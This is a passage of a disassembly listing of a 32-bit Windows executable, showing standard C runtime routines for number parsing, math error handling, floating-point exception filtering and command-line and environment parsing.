		movzx	ecx, bl
		movzx	ecx, word ptr [esi+ecx*2]
		test	cl, 4
		jz	short loc_40A91A
		movsx	ecx, bl
		sub	ecx, 30h
		jmp	short loc_40A934
; ---------------------------------------------------------------------------

loc_40A91A:				; CODE XREF: sub_40A7DB+135j
		test	cx, 103h
		jz	short loc_40A952
		mov	cl, bl
		sub	cl, 61h
		cmp	cl, 19h
		movsx	ecx, bl
		ja	short loc_40A931
		sub	ecx, 20h

loc_40A931:				; CODE XREF: sub_40A7DB+151j
		add	ecx, 0FFFFFFC9h

loc_40A934:				; CODE XREF: sub_40A7DB+13Dj
		cmp	ecx, [ebp+arg_C]
		jnb	short loc_40A952
		or	[ebp+arg_10], 8
		cmp	[ebp+var_4], eax
		jb	short loc_40A969
		jnz	short loc_40A948
		cmp	ecx, edx
		jbe	short loc_40A969

loc_40A948:				; CODE XREF: sub_40A7DB+167j
		or	[ebp+arg_10], 4
		cmp	[ebp+arg_8], 0
		jnz	short loc_40A975

loc_40A952:				; CODE XREF: sub_40A7DB+144j
					; sub_40A7DB+15Cj
		mov	eax, [ebp+arg_10]
		dec	edi
		test	al, 8
		jnz	short loc_40A97A
		cmp	[ebp+arg_8], 0
		jz	short loc_40A963
		mov	edi, [ebp+arg_4]

loc_40A963:				; CODE XREF: sub_40A7DB+183j
		and	[ebp+var_4], 0
		jmp	short loc_40A9C5
; ---------------------------------------------------------------------------

loc_40A969:				; CODE XREF: sub_40A7DB+165j
					; sub_40A7DB+16Bj
		mov	ebx, [ebp+var_4]
		imul	ebx, [ebp+arg_C]
		add	ebx, ecx
		mov	[ebp+var_4], ebx

loc_40A975:				; CODE XREF: sub_40A7DB+175j
		mov	bl, [edi]
		inc	edi
		jmp	short loc_40A906
; ---------------------------------------------------------------------------

loc_40A97A:				; CODE XREF: sub_40A7DB+17Dj
		test	al, 4
		mov	esi, 7FFFFFFFh
		jnz	short loc_40A99E
		test	al, 1
		jnz	short loc_40A9C5
		and	eax, 2
		jz	short loc_40A995
		cmp	[ebp+var_4], 80000000h
		ja	short loc_40A99E

loc_40A995:				; CODE XREF: sub_40A7DB+1AFj
		test	eax, eax
		jnz	short loc_40A9C5
		cmp	[ebp+var_4], esi
		jbe	short loc_40A9C5

loc_40A99E:				; CODE XREF: sub_40A7DB+1A6j
					; sub_40A7DB+1B8j
		call	sub_405B83
		test	byte ptr [ebp+arg_10], 1
		mov	dword ptr [eax], 22h
		jz	short loc_40A9B5
		or	[ebp+var_4], 0FFFFFFFFh
		jmp	short loc_40A9C5
; ---------------------------------------------------------------------------

loc_40A9B5:				; CODE XREF: sub_40A7DB+1D2j
		mov	al, byte ptr [ebp+arg_10]
		and	al, 2
		neg	al
		sbb	eax, eax
		neg	eax
		add	eax, esi
		mov	[ebp+var_4], eax

loc_40A9C5:				; CODE XREF: sub_40A7DB+18Cj
					; sub_40A7DB+1AAj ...
		mov	eax, [ebp+arg_8]
		test	eax, eax
		jz	short loc_40A9CE
		mov	[eax], edi

loc_40A9CE:				; CODE XREF: sub_40A7DB+1EFj
		test	byte ptr [ebp+arg_10], 2
		jz	short loc_40A9D7
		neg	[ebp+var_4]

loc_40A9D7:				; CODE XREF: sub_40A7DB+1F7j
		cmp	[ebp+var_8], 0
		jz	short loc_40A9E4
		mov	eax, [ebp+var_C]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_40A9E4:				; CODE XREF: sub_40A7DB+200j
		mov	eax, [ebp+var_4]
		jmp	short loc_40AA01
; ---------------------------------------------------------------------------

loc_40A9E9:				; CODE XREF: sub_40A7DB+BFj
					; sub_40A7DB+C8j ...
		mov	eax, [ebp+arg_8]
		test	eax, eax
		jz	short loc_40A9F2
		mov	[eax], esi

loc_40A9F2:				; CODE XREF: sub_40A7DB+213j
		cmp	[ebp+var_8], 0
		jz	short loc_40A9FF
		mov	eax, [ebp+var_C]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_40A9FF:				; CODE XREF: sub_40A7DB+21Bj
		xor	eax, eax

loc_40AA01:				; CODE XREF: sub_40A7DB+20Cj
		pop	ebx

loc_40AA02:				; CODE XREF: sub_40A7DB+4Cj
		pop	edi
		pop	esi
		leave
		retn
sub_40A7DB	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40AA06	proc near		; CODE XREF: sub_40415A+8p

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		xor	eax, eax
		cmp	dword_427420, eax
		push	eax
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		jnz	short loc_40AA24
		push	offset off_423680
		jmp	short loc_40AA25
; ---------------------------------------------------------------------------

loc_40AA24:				; CODE XREF: sub_40AA06+15j
		push	eax

loc_40AA25:				; CODE XREF: sub_40AA06+1Cj
		call	sub_40A7DB
		add	esp, 14h
		pop	ebp
		retn
sub_40AA06	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40AA2F	proc near		; CODE XREF: sub_404170+B5p

var_28		= dword	ptr -28h
var_24		= dword	ptr -24h
var_20		= qword	ptr -20h
var_18		= qword	ptr -18h
var_10		= qword	ptr -10h
var_8		= qword	ptr -8
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		sub	esp, 28h
		xor	eax, eax
		cmp	dword_427930, eax
		push	ebx
		mov	ebx, [ebp+arg_4]
		push	esi
		mov	esi, [ebp+arg_8]
		push	edi
		mov	edi, [ebp+arg_0]
		mov	byte ptr [ebp+var_8], al
		mov	byte ptr [ebp+var_8+1],	al
		mov	byte ptr [ebp+var_8+2],	al
		mov	byte ptr [ebp+var_8+3],	al
		mov	byte ptr [ebp+var_8+4],	al
		mov	byte ptr [ebp+var_8+5],	al
		mov	byte ptr [ebp+var_8+6],	al
		mov	byte ptr [ebp+var_8+7],	al
		jz	short loc_40AA71
		push	dword_4352E4
		call	sub_405543
		pop	ecx
		jmp	short loc_40AA76
; ---------------------------------------------------------------------------

loc_40AA71:				; CODE XREF: sub_40AA2F+32j
		mov	eax, offset sub_40FAB8

loc_40AA76:				; CODE XREF: sub_40AA2F+40j
		mov	ecx, [ebp+arg_C]
		mov	edx, 0A6h
		cmp	ecx, edx
		jg	loc_40ABFA
		jz	loc_40ABE7
		cmp	ecx, 19h
		jg	loc_40AB8D
		jz	loc_40AB84
		mov	edx, ecx
		push	2
		pop	ecx
		sub	edx, ecx
		jz	loc_40AB75
		dec	edx
		jz	loc_40AB6C
		sub	edx, 5
		jz	loc_40AB5D
		dec	edx
		jz	loc_40AB45
		sub	edx, 5
		jz	short loc_40AB35
		dec	edx
		jz	short loc_40AB0C
		sub	edx, 9
		jnz	loc_40ACA4	; default
		mov	[ebp+var_28], 3

loc_40AAD7:				; CODE XREF: sub_40AA2F+1ACj
		mov	[ebp+var_24], offset aPow ; "pow"

loc_40AADE:				; CODE XREF: sub_40AA2F+114j
					; sub_40AA2F+138j ...
		fld	qword ptr [edi]
		lea	ecx, [ebp+var_28]
		fstp	[ebp+var_20]
		push	ecx
		fld	qword ptr [ebx]
		fstp	[ebp+var_18]
		fld	qword ptr [esi]
		fstp	[ebp+var_10]
		call	eax
		test	eax, eax
		pop	ecx
		jnz	loc_40AC9F
		call	sub_405B83
		mov	dword ptr [eax], 22h
		jmp	loc_40AC9F
; ---------------------------------------------------------------------------

loc_40AB0C:				; CODE XREF: sub_40AA2F+96j
		mov	[ebp+var_24], offset aExp ; "exp"

loc_40AB13:				; CODE XREF: sub_40AA2F+15Cj
		fld	qword ptr [edi]
		lea	ecx, [ebp+var_28]
		fstp	[ebp+var_20]
		push	ecx
		fld	qword ptr [ebx]
		mov	[ebp+var_28], 4
		fstp	[ebp+var_18]
		fld	qword ptr [esi]
		fstp	[ebp+var_10]
		call	eax
		pop	ecx
		jmp	loc_40AC9F
; ---------------------------------------------------------------------------

loc_40AB35:				; CODE XREF: sub_40AA2F+93j
		mov	[ebp+var_28], 3
		mov	[ebp+var_24], offset aExp ; "exp"
		jmp	short loc_40AADE
; ---------------------------------------------------------------------------

loc_40AB45:				; CODE XREF: sub_40AA2F+8Aj
		mov	[ebp+var_24], offset aLog10 ; "log10"

loc_40AB4C:				; CODE XREF: sub_40AA2F+144j
					; sub_40AA2F+181j ...
		fld	qword ptr [edi]
		fstp	[ebp+var_20]
		fld	qword ptr [ebx]
		fstp	[ebp+var_18]
		fld	qword ptr [esi]
		jmp	loc_40AC7F
; ---------------------------------------------------------------------------

loc_40AB5D:				; CODE XREF: sub_40AA2F+83j
		mov	[ebp+var_28], ecx
		mov	[ebp+var_24], offset aLog10 ; "log10"
		jmp	loc_40AADE
; ---------------------------------------------------------------------------

loc_40AB6C:				; CODE XREF: sub_40AA2F+7Aj
		mov	[ebp+var_24], offset aLog ; "log"
		jmp	short loc_40AB4C
; ---------------------------------------------------------------------------

loc_40AB75:				; CODE XREF: sub_40AA2F+73j
		mov	[ebp+var_28], ecx
		mov	[ebp+var_24], offset aLog ; "log"
		jmp	loc_40AADE
; ---------------------------------------------------------------------------

loc_40AB84:				; CODE XREF: sub_40AA2F+66j
		mov	[ebp+var_24], offset aPow ; "pow"
		jmp	short loc_40AB13
; ---------------------------------------------------------------------------

loc_40AB8D:				; CODE XREF: sub_40AA2F+60j
		sub	ecx, 1Ah
		jz	short loc_40ABE0
		dec	ecx
		jz	short loc_40ABD4
		dec	ecx
		jz	short loc_40ABC8 ; jumptable 0040AC09 case 1006
		dec	ecx
		jz	short loc_40ABBB
		sub	ecx, 1Dh
		jz	short loc_40ABB2 ; jumptable 0040AC09 case 1008
		sub	ecx, 3
		jnz	loc_40ACA4	; default

loc_40ABA9:				; CODE XREF: sub_40AA2F+1DAj
					; DATA XREF: .text:off_40ACABo
		mov	[ebp+var_24], offset aAsin ; jumptable 0040AC09	case 1009
		jmp	short loc_40AB4C
; ---------------------------------------------------------------------------

loc_40ABB2:				; CODE XREF: sub_40AA2F+16Fj
					; sub_40AA2F+1DAj
					; DATA XREF: ...
		mov	[ebp+var_24], offset aAcos ; jumptable 0040AC09	case 1008
		jmp	short loc_40AB4C
; ---------------------------------------------------------------------------

loc_40ABBB:				; CODE XREF: sub_40AA2F+16Aj
		mov	[ebp+var_24], offset aPow ; "pow"

loc_40ABC2:				; CODE XREF: sub_40AA2F+1E8j
					; sub_40AA2F+1F1j ...
		fld	qword ptr [edi]
		fstp	qword ptr [esi]
		jmp	short loc_40AB4C
; ---------------------------------------------------------------------------

loc_40ABC8:				; CODE XREF: sub_40AA2F+167j
					; sub_40AA2F+1DAj
					; DATA XREF: ...
		mov	[ebp+var_24], offset aPow ; jumptable 0040AC09 case 1006
		jmp	loc_40AB4C
; ---------------------------------------------------------------------------

loc_40ABD4:				; CODE XREF: sub_40AA2F+164j
		mov	[ebp+var_28], 2
		jmp	loc_40AAD7
; ---------------------------------------------------------------------------

loc_40ABE0:				; CODE XREF: sub_40AA2F+161j
		fld1
		jmp	loc_40ACA2
; ---------------------------------------------------------------------------

loc_40ABE7:				; CODE XREF: sub_40AA2F+57j
		mov	[ebp+var_28], 3
		mov	[ebp+var_24], offset aExp10 ; "exp10"
		jmp	loc_40AADE
; ---------------------------------------------------------------------------

loc_40ABFA:				; CODE XREF: sub_40AA2F+51j
		add	ecx, 0FFFFFC18h	; switch 13 cases
		cmp	ecx, 0Ch
		ja	loc_40ACA4	; default
		jmp	ds:off_40ACAB[ecx*4] ; switch jump

loc_40AC10:				; DATA XREF: .text:off_40ACABo
		mov	[ebp+var_24], offset aLog ; jumptable 0040AC09 case 1000
		jmp	short loc_40ABC2
; ---------------------------------------------------------------------------

loc_40AC19:				; CODE XREF: sub_40AA2F+1DAj
					; DATA XREF: .text:off_40ACABo
		mov	[ebp+var_24], offset aLog10 ; jumptable	0040AC09 case 1001
		jmp	short loc_40ABC2
; ---------------------------------------------------------------------------

loc_40AC22:				; CODE XREF: sub_40AA2F+1DAj
					; DATA XREF: .text:off_40ACABo
		mov	[ebp+var_24], offset aExp ; jumptable 0040AC09 case 1002
		jmp	short loc_40ABC2
; ---------------------------------------------------------------------------

loc_40AC2B:				; CODE XREF: sub_40AA2F+1DAj
					; DATA XREF: .text:off_40ACABo
		mov	[ebp+var_24], offset aAtan ; jumptable 0040AC09	case 1003
		jmp	short loc_40ABC2
; ---------------------------------------------------------------------------

loc_40AC34:				; CODE XREF: sub_40AA2F+1DAj
					; DATA XREF: .text:off_40ACABo
		mov	[ebp+var_24], offset aCeil ; jumptable 0040AC09	case 1004
		jmp	short loc_40ABC2
; ---------------------------------------------------------------------------

loc_40AC3D:				; CODE XREF: sub_40AA2F+1DAj
					; DATA XREF: .text:off_40ACABo
		mov	[ebp+var_24], offset aFloor ; jumptable	0040AC09 case 1005
		jmp	loc_40ABC2
; ---------------------------------------------------------------------------

loc_40AC49:				; CODE XREF: sub_40AA2F+1DAj
					; DATA XREF: .text:off_40ACABo
		mov	[ebp+var_24], offset aModf ; jumptable 0040AC09	case 1007
		jmp	loc_40ABC2
; ---------------------------------------------------------------------------

loc_40AC55:				; CODE XREF: sub_40AA2F+1DAj
					; DATA XREF: .text:off_40ACABo
		mov	[ebp+var_24], offset dword_41DBD0 ; jumptable 0040AC09 case 1010
		jmp	short loc_40AC6E
; ---------------------------------------------------------------------------

loc_40AC5E:				; CODE XREF: sub_40AA2F+1DAj
					; DATA XREF: .text:off_40ACABo
		mov	[ebp+var_24], offset dword_41DBCC ; jumptable 0040AC09 case 1011
		jmp	short loc_40AC6E
; ---------------------------------------------------------------------------

loc_40AC67:				; CODE XREF: sub_40AA2F+1DAj
					; DATA XREF: .text:off_40ACABo
		mov	[ebp+var_24], offset dword_41DBC8 ; jumptable 0040AC09 case 1012

loc_40AC6E:				; CODE XREF: sub_40AA2F+22Dj
					; sub_40AA2F+236j
		fld	qword ptr [edi]
		fmul	[ebp+var_8]
		fst	qword ptr [esi]
		fld	qword ptr [edi]
		fstp	[ebp+var_20]
		fld	qword ptr [ebx]
		fstp	[ebp+var_18]

loc_40AC7F:				; CODE XREF: sub_40AA2F+129j
		lea	ecx, [ebp+var_28]
		fstp	[ebp+var_10]
		push	ecx
		mov	[ebp+var_28], 1
		call	eax
		test	eax, eax
		pop	ecx
		jnz	short loc_40AC9F
		call	sub_405B83
		mov	dword ptr [eax], 21h

loc_40AC9F:				; CODE XREF: sub_40AA2F+C7j
					; sub_40AA2F+D8j ...
		fld	[ebp+var_10]

loc_40ACA2:				; CODE XREF: sub_40AA2F+1B3j
		fstp	qword ptr [esi]

loc_40ACA4:				; CODE XREF: sub_40AA2F+9Bj
					; sub_40AA2F+174j ...
		pop	edi		; default
		pop	esi
		pop	ebx
		leave
		retn
sub_40AA2F	endp

; ---------------------------------------------------------------------------
		db 8Bh,	0FFh
off_40ACAB	dd offset loc_40AC10	; DATA XREF: sub_40AA2F+1DAr
		dd offset loc_40AC19	; jump table for switch	statement
		dd offset loc_40AC22
		dd offset loc_40AC2B
		dd offset loc_40AC34
		dd offset loc_40AC3D
		dd offset loc_40ABC8
		dd offset loc_40AC49
		dd offset loc_40ABB2
		dd offset loc_40ABA9
		dd offset loc_40AC55
		dd offset loc_40AC5E
		dd offset loc_40AC67

; =============== S U B	R O U T	I N E =======================================



sub_40ACDF	proc near		; DATA XREF: _1fieagrn:0041D2E0o
		and	dword_4352DC, 0
		call	sub_40FB8A
		mov	dword_4352DC, eax
		xor	eax, eax
		retn
sub_40ACDF	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

; int __cdecl sub_40ACF3(double)

sub_40ACF3	proc near		; CODE XREF: sub_404170+7j
					; sub_404170+38j

var_24		= qword	ptr -24h
var_18		= qword	ptr -18h
var_8		= qword	ptr -8
arg_0		= qword	ptr  8

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ecx
		push	ebx
		push	esi
		mov	esi, 0FFFFh
		push	esi
		push	dword_423DB8
		call	sub_41040E
		fld	[ebp+arg_0]
		pop	ecx
		pop	ecx
		mov	ebx, eax
		mov	eax, dword ptr [ebp+arg_0+6]
		push	ecx
		and	ax, 7FF0h
		cmp	ax, 7FF0h
		push	ecx
		fstp	[esp+18h+var_18]
		jnz	short loc_40AD79
		call	sub_4102ED
		test	eax, eax
		pop	ecx
		pop	ecx
		jle	short loc_40AD5C
		cmp	eax, 2
		jle	short loc_40AD4E
		cmp	eax, 3
		jnz	short loc_40AD5C
		fld	[ebp+arg_0]
		push	ebx		; int
		push	ecx
		push	ecx		; double
		fstp	qword ptr [esp]
		push	0Ch		; int
		call	sub_4101A5
		add	esp, 10h
		jmp	short loc_40ADC0
; ---------------------------------------------------------------------------

loc_40AD4E:				; CODE XREF: sub_40ACF3+3Fj
		push	esi
		push	ebx
		call	sub_41040E
		fld	[ebp+arg_0]
		pop	ecx
		pop	ecx
		jmp	short loc_40ADC0
; ---------------------------------------------------------------------------

loc_40AD5C:				; CODE XREF: sub_40ACF3+3Aj
					; sub_40ACF3+44j
		fld	[ebp+arg_0]
		push	ebx
		fadd	ds:dbl_41DC00
		sub	esp, 10h
		fstp	qword ptr [esp+8]
		fld	[ebp+arg_0]
		fstp	[esp+24h+var_24]
		push	0Ch
		push	8
		jmp	short loc_40ADB8
; ---------------------------------------------------------------------------

loc_40AD79:				; CODE XREF: sub_40ACF3+2Fj
		call	sub_4102B2
		fstp	[ebp+var_8]
		fld	[ebp+arg_0]
		pop	ecx
		fcomp	[ebp+var_8]
		pop	ecx
		fnstsw	ax
		test	ah, 44h
		jp	short loc_40AD9E

loc_40AD90:				; CODE XREF: sub_40ACF3+AEj
		push	esi
		push	ebx
		call	sub_41040E
		fld	[ebp+var_8]
		pop	ecx
		pop	ecx
		jmp	short loc_40ADC0
; ---------------------------------------------------------------------------

loc_40AD9E:				; CODE XREF: sub_40ACF3+9Bj
		test	bl, 20h
		jnz	short loc_40AD90
		fld	[ebp+var_8]
		push	ebx		; int
		sub	esp, 10h
		fstp	qword ptr [esp+8]
		fld	[ebp+arg_0]
		fstp	[esp+24h+var_24]
		push	0Ch		; int
		push	10h		; int

loc_40ADB8:				; CODE XREF: sub_40ACF3+84j
		call	sub_4101F8
		add	esp, 1Ch

loc_40ADC0:				; CODE XREF: sub_40ACF3+59j
					; sub_40ACF3+67j ...
		pop	esi
		pop	ebx
		leave
		retn
sub_40ACF3	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40ADC4	proc near		; CODE XREF: .text:0040448Bp

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ecx
		push	esi
		call	sub_4056CA
		mov	esi, eax
		test	esi, esi
		jnz	short loc_40ADE3
		push	[ebp+arg_4]
		call	ds:off_41D198
		jmp	loc_40AF30
; ---------------------------------------------------------------------------

loc_40ADE3:				; CODE XREF: sub_40ADC4+Fj
		mov	edx, [esi+5Ch]
		mov	eax, dword_423E44
		push	edi
		mov	edi, [ebp+arg_0]
		mov	ecx, edx
		push	ebx

loc_40ADF2:				; CODE XREF: sub_40ADC4+3Ej
		cmp	[ecx], edi
		jz	short loc_40AE04
		mov	ebx, eax
		imul	ebx, 0Ch
		add	ecx, 0Ch
		add	ebx, edx
		cmp	ecx, ebx
		jb	short loc_40ADF2

loc_40AE04:				; CODE XREF: sub_40ADC4+30j
		imul	eax, 0Ch
		add	eax, edx
		cmp	ecx, eax
		jnb	short loc_40AE15
		cmp	[ecx], edi
		jnz	short loc_40AE15
		mov	eax, ecx
		jmp	short loc_40AE17
; ---------------------------------------------------------------------------

loc_40AE15:				; CODE XREF: sub_40ADC4+47j
					; sub_40ADC4+4Bj
		xor	eax, eax

loc_40AE17:				; CODE XREF: sub_40ADC4+4Fj
		test	eax, eax
		jz	short loc_40AE25
		mov	ebx, [eax+8]
		test	ebx, ebx
		mov	[ebp+var_4], ebx
		jnz	short loc_40AE33

loc_40AE25:				; CODE XREF: sub_40ADC4+55j
		push	[ebp+arg_4]
		call	ds:off_41D198
		jmp	loc_40AF2E
; ---------------------------------------------------------------------------

loc_40AE33:				; CODE XREF: sub_40ADC4+5Fj
		cmp	ebx, 5
		jnz	short loc_40AE44
		and	dword ptr [eax+8], 0
		xor	eax, eax
		inc	eax
		jmp	loc_40AF2E
; ---------------------------------------------------------------------------

loc_40AE44:				; CODE XREF: sub_40ADC4+72j
		cmp	ebx, 1
		jz	loc_40AF2B
		mov	ecx, [esi+60h]
		mov	[ebp+var_8], ecx
		mov	ecx, [ebp+arg_4]
		mov	[esi+60h], ecx
		mov	ecx, [eax+4]
		cmp	ecx, 8
		jnz	loc_40AF1D
		mov	ecx, dword_423E38
		mov	edi, dword_423E3C
		mov	edx, ecx
		add	edi, ecx
		cmp	edx, edi
		jge	short loc_40AE9D
		imul	ecx, 0Ch

loc_40AE7C:				; CODE XREF: sub_40ADC4+D4j
		mov	edi, [esi+5Ch]
		and	dword ptr [ecx+edi+8], 0
		mov	edi, dword_423E38
		mov	ebx, dword_423E3C
		inc	edx
		add	ebx, edi
		add	ecx, 0Ch
		cmp	edx, ebx
		jl	short loc_40AE7C
		mov	ebx, [ebp+var_4]

loc_40AE9D:				; CODE XREF: sub_40ADC4+B3j
		mov	eax, [eax]
		cmp	eax, 0C000008Eh
		mov	edi, [esi+64h]
		jnz	short loc_40AEB2
		mov	dword ptr [esi+64h], 83h
		jmp	short loc_40AF10
; ---------------------------------------------------------------------------

loc_40AEB2:				; CODE XREF: sub_40ADC4+E3j
		cmp	eax, 0C0000090h
		jnz	short loc_40AEC2
		mov	dword ptr [esi+64h], 81h
		jmp	short loc_40AF10
; ---------------------------------------------------------------------------

loc_40AEC2:				; CODE XREF: sub_40ADC4+F3j
		cmp	eax, 0C0000091h
		jnz	short loc_40AED2
		mov	dword ptr [esi+64h], 84h
		jmp	short loc_40AF10
; ---------------------------------------------------------------------------

loc_40AED2:				; CODE XREF: sub_40ADC4+103j
		cmp	eax, 0C0000093h
		jnz	short loc_40AEE2
		mov	dword ptr [esi+64h], 85h
		jmp	short loc_40AF10
; ---------------------------------------------------------------------------

loc_40AEE2:				; CODE XREF: sub_40ADC4+113j
		cmp	eax, 0C000008Dh
		jnz	short loc_40AEF2
		mov	dword ptr [esi+64h], 82h
		jmp	short loc_40AF10
; ---------------------------------------------------------------------------

loc_40AEF2:				; CODE XREF: sub_40ADC4+123j
		cmp	eax, 0C000008Fh
		jnz	short loc_40AF02
		mov	dword ptr [esi+64h], 86h
		jmp	short loc_40AF10
; ---------------------------------------------------------------------------

loc_40AF02:				; CODE XREF: sub_40ADC4+133j
		cmp	eax, 0C0000092h
		jnz	short loc_40AF10
		mov	dword ptr [esi+64h], 8Ah

loc_40AF10:				; CODE XREF: sub_40ADC4+ECj
					; sub_40ADC4+FCj ...
		push	dword ptr [esi+64h]
		push	8
		call	ebx
		pop	ecx
		mov	[esi+64h], edi
		jmp	short loc_40AF24
; ---------------------------------------------------------------------------

loc_40AF1D:				; CODE XREF: sub_40ADC4+9Bj
		and	dword ptr [eax+8], 0
		push	ecx
		call	ebx

loc_40AF24:				; CODE XREF: sub_40ADC4+157j
		mov	eax, [ebp+var_8]
		pop	ecx
		mov	[esi+60h], eax

loc_40AF2B:				; CODE XREF: sub_40ADC4+83j
		or	eax, 0FFFFFFFFh

loc_40AF2E:				; CODE XREF: sub_40ADC4+6Aj
					; sub_40ADC4+7Bj
		pop	ebx
		pop	edi

loc_40AF30:				; CODE XREF: sub_40ADC4+1Aj
		pop	esi
		leave
		retn
sub_40ADC4	endp


; =============== S U B	R O U T	I N E =======================================



sub_40AF33	proc near		; CODE XREF: sub_4044D2:loc_404448p
		push	esi
		push	edi
		xor	edi, edi
		cmp	dword_436434, edi
		jnz	short loc_40AF44
		call	sub_4051B3

loc_40AF44:				; CODE XREF: sub_40AF33+Aj
		mov	esi, dword_436458
		test	esi, esi
		jnz	short loc_40AF53
		mov	esi, offset word_41D492

loc_40AF53:				; CODE XREF: sub_40AF33+19j
					; sub_40AF33+4Bj
		mov	al, [esi]
		cmp	al, 20h
		ja	short loc_40AF61
		test	al, al
		jz	short loc_40AF8B
		test	edi, edi
		jz	short loc_40AF85

loc_40AF61:				; CODE XREF: sub_40AF33+24j
		cmp	al, 22h
		jnz	short loc_40AF6E
		xor	ecx, ecx
		test	edi, edi
		setz	cl
		mov	edi, ecx

loc_40AF6E:				; CODE XREF: sub_40AF33+30j
		movzx	eax, al
		push	eax
		call	sub_41054E
		test	eax, eax
		pop	ecx
		jz	short loc_40AF7D
		inc	esi

loc_40AF7D:				; CODE XREF: sub_40AF33+47j
		inc	esi
		jmp	short loc_40AF53
; ---------------------------------------------------------------------------

loc_40AF80:				; CODE XREF: sub_40AF33+56j
		cmp	al, 20h
		ja	short loc_40AF8B
		inc	esi

loc_40AF85:				; CODE XREF: sub_40AF33+2Cj
		mov	al, [esi]
		test	al, al
		jnz	short loc_40AF80

loc_40AF8B:				; CODE XREF: sub_40AF33+28j
					; sub_40AF33+4Fj
		pop	edi
		mov	eax, esi
		pop	esi
		retn
sub_40AF33	endp


; =============== S U B	R O U T	I N E =======================================



sub_40AF90	proc near		; CODE XREF: sub_4044D2:loc_404425p
		push	ebx
		xor	ebx, ebx
		cmp	dword_436434, ebx
		push	esi
		push	edi
		jnz	short loc_40AFA2
		call	sub_4051B3

loc_40AFA2:				; CODE XREF: sub_40AF90+Bj
		mov	esi, dword_4270D4
		xor	edi, edi
		cmp	esi, ebx
		jnz	short loc_40AFC6

loc_40AFAE:				; CODE XREF: sub_40AF90+51j
		or	eax, 0FFFFFFFFh
		jmp	loc_40B051
; ---------------------------------------------------------------------------

loc_40AFB6:				; CODE XREF: sub_40AF90+3Aj
		cmp	al, 3Dh
		jz	short loc_40AFBB
		inc	edi

loc_40AFBB:				; CODE XREF: sub_40AF90+28j
		push	esi
		call	sub_4044E0
		pop	ecx
		lea	esi, [esi+eax+1]

loc_40AFC6:				; CODE XREF: sub_40AF90+1Cj
		mov	al, [esi]
		cmp	al, bl
		jnz	short loc_40AFB6
		push	4
		inc	edi
		push	edi
		call	sub_407B2A
		mov	edi, eax
		cmp	edi, ebx
		pop	ecx
		pop	ecx
		mov	dword_4275D8, edi
		jz	short loc_40AFAE
		mov	esi, dword_4270D4
		push	ebp
		jmp	short loc_40B02C
; ---------------------------------------------------------------------------

loc_40AFEC:				; CODE XREF: sub_40AF90+9Ej
		push	esi
		call	sub_4044E0
		mov	ebp, eax
		inc	ebp
		cmp	byte ptr [esi],	3Dh
		pop	ecx
		jz	short loc_40B02A
		push	1
		push	ebp
		call	sub_407B2A
		cmp	eax, ebx
		pop	ecx
		pop	ecx
		mov	[edi], eax
		jz	short loc_40B055
		push	esi
		push	ebp
		push	eax
		call	sub_407A85
		add	esp, 0Ch
		test	eax, eax
		jz	short loc_40B027
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		call	sub_4031FD
		add	esp, 14h

loc_40B027:				; CODE XREF: sub_40AF90+88j
		add	edi, 4

loc_40B02A:				; CODE XREF: sub_40AF90+69j
		add	esi, ebp

loc_40B02C:				; CODE XREF: sub_40AF90+5Aj
		cmp	[esi], bl
		jnz	short loc_40AFEC
		push	dword_4270D4
		call	sub_4039C3
		mov	dword_4270D4, ebx
		mov	[edi], ebx
		mov	dword_436428, 1
		xor	eax, eax

loc_40B04F:				; CODE XREF: sub_40AF90+D9j
		pop	ecx
		pop	ebp

loc_40B051:				; CODE XREF: sub_40AF90+21j
		pop	edi
		pop	esi
		pop	ebx
		retn
; ---------------------------------------------------------------------------

loc_40B055:				; CODE XREF: sub_40AF90+79j
		push	dword_4275D8
		call	sub_4039C3
		mov	dword_4275D8, ebx
		or	eax, 0FFFFFFFFh
		jmp	short loc_40B04F
sub_40AF90	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40B06B	proc near		; CODE XREF: sub_40B203+55p
					; sub_40B203+96p

var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		push	ecx
		mov	ecx, [ebp+arg_8]
		push	ebx
		xor	eax, eax
		cmp	[ebp+arg_0], eax
		push	esi
		mov	[edi], eax
		mov	esi, edx
		mov	edx, [ebp+arg_4]
		mov	dword ptr [ecx], 1
		jz	short loc_40B091
		mov	ebx, [ebp+arg_0]
		add	[ebp+arg_0], 4
		mov	[ebx], edx

loc_40B091:				; CODE XREF: sub_40B06B+1Bj
		mov	[ebp+var_4], eax

loc_40B094:				; CODE XREF: sub_40B06B+7Ej
					; sub_40B06B+88j
		cmp	byte ptr [esi],	22h
		jnz	short loc_40B0A9
		xor	eax, eax
		cmp	[ebp+var_4], eax
		mov	bl, 22h
		setz	al
		inc	esi
		mov	[ebp+var_4], eax
		jmp	short loc_40B0E5
; ---------------------------------------------------------------------------

loc_40B0A9:				; CODE XREF: sub_40B06B+2Cj
		inc	dword ptr [edi]
		test	edx, edx
		jz	short loc_40B0B7
		mov	al, [esi]
		mov	[edx], al
		inc	edx
		mov	[ebp+arg_4], edx

loc_40B0B7:				; CODE XREF: sub_40B06B+42j
		mov	bl, [esi]
		movzx	eax, bl
		push	eax
		inc	esi
		call	sub_41054E
		test	eax, eax
		pop	ecx
		jz	short loc_40B0DB
		inc	dword ptr [edi]
		cmp	[ebp+arg_4], 0
		jz	short loc_40B0DA
		mov	ecx, [ebp+arg_4]
		mov	al, [esi]
		inc	[ebp+arg_4]
		mov	[ecx], al

loc_40B0DA:				; CODE XREF: sub_40B06B+63j
